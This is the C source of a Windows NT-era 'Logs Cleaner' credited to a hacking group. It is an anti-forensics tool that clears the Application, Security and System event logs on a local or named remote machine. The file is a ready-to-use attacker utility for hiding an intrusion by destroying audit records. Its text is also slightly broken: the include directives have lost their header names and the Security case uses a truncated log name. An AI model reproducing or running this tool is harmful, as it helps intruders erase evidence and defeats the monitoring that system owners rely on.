/* ______ _ _ __ _ | ___ \ | || | / / | | | |_/ / ___ __| || |/ / ___ __| | | / / _ \ / _` || \ / _ \ / _` | | |\ \ | __/| (_| || |\ \| (_) || (_| | \_| \_| \___| \__,_|\_| \_/ \___/ \__,_| Logs Cleaner for WinNT Systems (nt4?, 2k, XP) - Version 0.1 - RedKod Team www.redkod.com Coder: R-e-D Mail : r-e-d@redkod.com */ #include #include char *DisplayError(void) { LPVOID error; char *buffer=NULL; FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR)&error, 0, NULL); buffer = (char *)GlobalAlloc(GPTR, strlen(error)+1); sprintf(buffer, "%s", error); return(buffer); } int ErareLog(const char *host, const char *type) { HANDLE hEvent; hEvent = RegisterEventSource(host, type); if(hEvent == NULL) { fprintf(stderr, "Could not register event source. %s", DisplayError()); return(-1); } if(ClearEventLog(hEvent, NULL) == 0) { fprintf(stderr, "Error while erasing the logfile. %s", DisplayError()); return(-1); } fprintf(stdout, "[*] %s log erased.\n", type); DeregisterEventSource(hEvent); return(0); } int main(int argc, char **argv) { char *version = "\nLogs cleaner 0.1 for WinNT systems by R-e-D\n" "\thttp://www.redkod.com/\n" "\t r-e-d@redkod.com\n\n"; fprintf(stdout, "%s", version); if(argc < 3) { fprintf(stdout, "Usage : %s [\\ComputerName] <-a (Applications) / -e (Security) / -s (System) / -r (All) / -t >\n", argv[0]); return(-1); } switch(argv[2][1]) { case 'a': /* Applications */ ErareLog(argv[1], "Applications"); break; case 'e': /* Security */ ErareLog(argv[1], "Secu"); break; case 's': /* System */ ErareLog(argv[1], "System"); break; case 'r': /* All */ ErareLog(argv[1], "Applications"); ErareLog(argv[1], "Secu"); ErareLog(argv[1], "System"); break; case 't': /* Type specified by user */ ErareLog(argv[1], argv[3]); break; default: /* Uh? */ fprintf(stdout, "Please, specify a correct event log type.\n"); return(-1); break; } return(0); }